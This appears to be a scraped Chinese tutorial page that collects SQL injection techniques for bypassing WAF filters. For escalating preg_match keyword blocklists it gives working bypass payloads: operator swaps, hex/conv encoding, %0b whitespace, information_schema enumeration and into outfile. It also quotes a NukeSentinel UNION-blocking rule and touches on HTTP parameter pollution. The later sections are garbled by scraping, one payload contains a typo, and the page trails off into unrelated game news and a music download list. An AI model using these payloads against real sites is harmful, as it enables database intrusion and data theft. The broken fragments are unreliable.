一、 绕过waf思路
从第一步起,一点一点去分析,然后绕过。
1、过滤 and,or
preg_match('/(and|or)/i', $id) Filtered injection: 1 or 1 = 1 1 and 1 = 1 Bypassed injection: 1 || 1 = 1 1 && 1 = 1
2、过滤 and, or, union
preg_match('/(and|or|union)/i', $id) Filtered injection: union select user, password from users Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'
3、过滤 and, or, union, where
preg_match('/(and|or|union|where)/i', $id) Filtered injection: 1 || (select user from users where user_id = 1) = 'admin' Bypassed injection: 1 || (select user from users limit 1) = 'admin'
4、过滤 and, or, union, where, limit
preg_match('/(and|or|union|where|limit)/i', $id) Filtered injection: 1 || (select user from users limit 1) = 'admin' Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
5、过滤 and, or, union, where, limit, group by
preg_match('/(and|or|union|where|limit|group by)/i', $id) Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin' Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1
6、过滤 and, or, union, where, limit, group by, select
preg_match('/(and|or|union|where|limit|group by|select)/i', $id) Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 Bypassed injection: 1 || 1 = 1 into outfile 'result.txt' Bypassed injection: 1 || substr(user,1,1) = 'a'
7、过滤 and, or, union, where, limit, group by, select, ‘
preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id) Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 Bypassed injection: 1 || user_id is not null Bypassed injection: 1 || substr(user,1,1) = 0x61 Bypassed injection: 1 || substr(user,1,1) = unhex(61)
8、过滤 and, or, union, where, limit, group by, select, ‘, hex
preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id) Filtered injection: 1 || substr(user,1,1) = unhex(61) Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
9、过滤 and, or, union, where, limit, group by, select, ‘, hex, substr
preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id) Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36)) Bypassed injection: 1 || lpad(user,7,1)
10、过滤 and, or, union, where, limit, group by, select, ‘, hex, substr, 空格
preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id) Filtered injection: 1 || lpad(user,7,1) ypassed injection: 1%0b||%0blpad(user,7,1)
二、正则绕过
根据正则的的模糊匹配特性绕过,比如过滤了'='
filtered injection: 1 or 1 = 1
Bypassed injection: 1 or 1,1 or ‘1',1 or char(97)
eg: filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users' Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z' Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122) Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a Bypassed Injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
三、通用绕过
1.注释符
"htmlcode">"htmlcode">"htmlcode">Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).html Bypassed : http://localhost/id/1%0b||%0blpad(first_name,7,1).html4.编码
一个经典的脚本:Nukesentinel.php
// Check for UNION attack // Copyright 2004(c) Raven PHP Scripts $blocker_row = $blocker_array[1]; if($blocker_row['activate'] > 0) { if (stristr($nsnst_const['query_string'],'+union+') OR stristr($nsnst_const['query_string'],'%20union%20') OR stristr($nsnst_const['query_string'],'*/union/*') OR stristr($nsnst_const['query_string'],' union ') OR stristr($nsnst_const['query_string_base64'],'+union+') OR stristr($nsnst_const['query_string_base64'],'%20union%20') OR stristr($nsnst_const['query_string_base64'],'*/union/*') OR stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row); die("BLOCK IP 1 " ); } }Forbidden: http://localhost/php/"htmlcode">http://localhost/news.php"htmlcode">http://localhost/news.php"color: #ff0000">四、高级绕过
1.HPP(http参数污染)
举个例子:
index.php"htmlcode">Forbidden: http://localhost/search.aspx"htmlcode">Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' () Reserved : ; / "htmlcode">| Query String | Apache/2.2.16,PHP/5.3.3 | IIS6/ASP | | :— | :— | :— | | "htmlcode">Forbidden: http://localhost/"color: #ff0000">总结以上就是关于sql注入绕过的技巧总结,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对的支持。
DDR爱好者之家 Design By 杰米广告合作:本站广告合作请联系QQ:858582 申请时备注:广告合作(否则不回)
免责声明:本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除!DDR爱好者之家 Design By 杰米暂无评论...《魔兽世界》大逃杀!60人新游玩模式《强袭风暴》3月21日上线
暴雪近日发布了《魔兽世界》10.2.6 更新内容,新游玩模式《强袭风暴》即将于3月21 日在亚服上线,届时玩家将前往阿拉希高地展开一场 60 人大逃杀对战。
艾泽拉斯的冒险者已经征服了艾泽拉斯的大地及遥远的彼岸。他们在对抗世界上最致命的敌人时展现出过人的手腕,并且成功阻止终结宇宙等级的威胁。当他们在为即将于《魔兽世界》资料片《地心之战》中来袭的萨拉塔斯势力做战斗准备时,他们还需要在熟悉的阿拉希高地面对一个全新的敌人──那就是彼此。在《巨龙崛起》10.2.6 更新的《强袭风暴》中,玩家将会进入一个全新的海盗主题大逃杀式限时活动,其中包含极高的风险和史诗级的奖励。
《强袭风暴》不是普通的战场,作为一个独立于主游戏之外的活动,玩家可以用大逃杀的风格来体验《魔兽世界》,不分职业、不分装备(除了你在赛局中捡到的),光是技巧和战略的强弱之分就能决定出谁才是能坚持到最后的赢家。本次活动将会开放单人和双人模式,玩家在加入海盗主题的预赛大厅区域前,可以从强袭风暴角色画面新增好友。游玩游戏将可以累计名望轨迹,《巨龙崛起》和《魔兽世界:巫妖王之怒 经典版》的玩家都可以获得奖励。
更新日志
2024年05月05日2024年05月05日
- 群星《今天的她们 电视剧原声带》[320K/MP3][92.29MB]
- 鸿雁组合《草原最强音HQ》头版限量[低速原抓WAV+CUE]
- 潘美辰.1995-原谅我改变(粤)【星光】【WAV+CUE】
- 水木年华.2011-十年·启程2010北京工体演唱会2CD【水木同创】【WAV+CUE】
- 群星《今天的她们 电视剧原声带》[FLAC/分轨][162.95MB]
- 群星《2023-2024南面而歌 新世代台语歌创作专辑》[320K/MP3][99.79MB]
- 邝美云《一期一会 邝美云精选集》[320K/MP3][525.2MB]
- 姜育恒.1997-精华辑(引进版)【开丽创意】【WAV+CUE】
- 张惠妹.2009-阿密特NEWXRCD【金牌大风】【WAV+CUE】
- 戴军.1995-阿莲·新娘【大藏艺术】【WAV+CUE】
- ABC德国制《英国天朗88周年纪念版》6N纯银镀膜[低速原抓WAV+CUE]
- 原音母版1:1直刻《经典粤语老歌》[低速原抓WAV+CUE]
- 山口百惠-L.A.Blue[黑胶-ISO]
- 邝美云《一期一会 邝美云精选集》[FLAC/分轨][1.35G]
- 缇ゆ槦銆婅豹椹剧鏇插鍒╀笓鐢ㄣ€媅WAV鍒嗚建][567M]